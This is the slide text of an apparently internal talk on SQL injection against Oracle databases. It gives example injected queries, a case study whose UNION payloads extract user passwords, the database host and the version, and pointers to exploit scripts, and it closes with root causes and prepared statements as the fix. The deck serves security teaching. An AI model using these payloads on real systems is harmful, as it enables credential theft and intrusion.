Who s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl 1
http://xkcd.com/327/ 2
What Is SQL Injection? Incorrectly validated or nonvalidated string literals are concatenated into a dynamic SQL statement, and interpreted as code by the SQL engine. 3
Why SQL Injection? Get access to a different user account Find data you are not allowed to see Become a DBA without job promotion Infiltrate other backend servers assuming you are a really bad guy 4
Categories of Attacks SQL Manipulation Code Injection Function Call Injection Buffer Overflows 5
SQL Manipulation SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword' SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword' or 'a' = 'a' The WHERE clause is true for every row 6
SQL Manipulation SELECT product_name FROM all_products WHERE product_name like '%Chairs%' SELECT product_name FROM all_products WHERE product_name like '%Chairs' UNION SELECT username FROM dba_users WHERE username like '%' SQL statement is returning rows from another table 7
Code Injection SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'; SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'; DELETE FROM users WHERE username = 'admin'; Does not work with Oracle (easily)... 8
Function Call Injection SELECT TRANSLATE('user input', '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789') FROM dual; SELECT TRANSLATE('' UTL_HTTP.REQUEST('http:// 192.168.1.1/') '', '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789') FROM dual; UTL_HTTP.REQUEST uses a URL as its argument and returns up to the first 2000 bytes of data retrieved from that URL 9
Are You Afraid of SQL Injection?! 10
You Better Should 11
First Contact 12
First Contact '; -- 13
14
Hello World ' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1=' ' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1=' 15
Hello World ' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1=' 16
Password Helper ' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1=' ' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1=' 17
Password Helper ' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1=' 18
Password Helper select table_x_site_search.x_site_objid, x_bo_status,x_bo_x_sales_segment, x_bo_org_id,x_b_x_ban_id, x_company_name,x_a_address,x_a_zipcode,x_a_city, x_ctry_name,x_ctry_x_iso_code_2l, x_b_x_firmenbuchnummer,x_b_x_uid_number, x_e_first_name,x_e_last_name, x_e_e_mail,x_user_login_name from table_x_site_search, table_bus_org where table_x_site_search.x_bo_org_id = table_bus_org.org_id and x_s_company_name like 'MO%' and x_ctry_x_iso_code_2l = 'AT' and upper(x_a_s_address) like 'ER%' and x_a_zipcode = '' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('MKPE9R') OR 1='' and rownum <= 200 19
DB Host Lookup ' UNION SELECT 1,0,'','','',S.MACHINE,'','','','','','','','','','','' FROM V$SESSION S, V$PROCESS P WHERE P.SPID = S.PROCESS AND MACHINE IS NOT NULL OR 1=' 20
Get Oracle Version ' UNION SELECT 1,0,'','','',VERSION,'','','','','','','','','','','' FROM DBA_REGISTRY WHERE COMP_ID = 'CATALOG' OR 1=' 21
Oracle Cheat Sheet List users and password hashes checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10. List all databases, tables and columns Local file access using UTL_FILE Make DNS requests 22
Cool Oracle Exploits raptor_oraextproc.sql raptor_oraexec.sql raptor_orafile.sql Directory traversal vulnerability in extproc Exploitation suite for Oracle written in Java, to read/write files and execute OS commands File system access suite for Oracle based on the utl_file package, to read/ write files 23
Root Cause Analysis Affects CUSI I29 and I30-dev RegExp validation for PLZ is broken Input field is not truncated No SQL escaping of query parameter Literal SQL Statement is used Passwords are not always encrypted 24
How To Avoid Prepared Statements Test for SQL Vulnerability Code Reviews Think about security Before someone else is doing it for you 25
Why this would not happen to you?! 26
Question And Answers 27
Resources http://www.net-security.org/dl/articles/integrigyintrotosqlinjectionattacks.pdf http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/ http://www.0xdeadbeef.info/ http://www.red-database-security.com/exploits/oracle_10g_exploits.html 28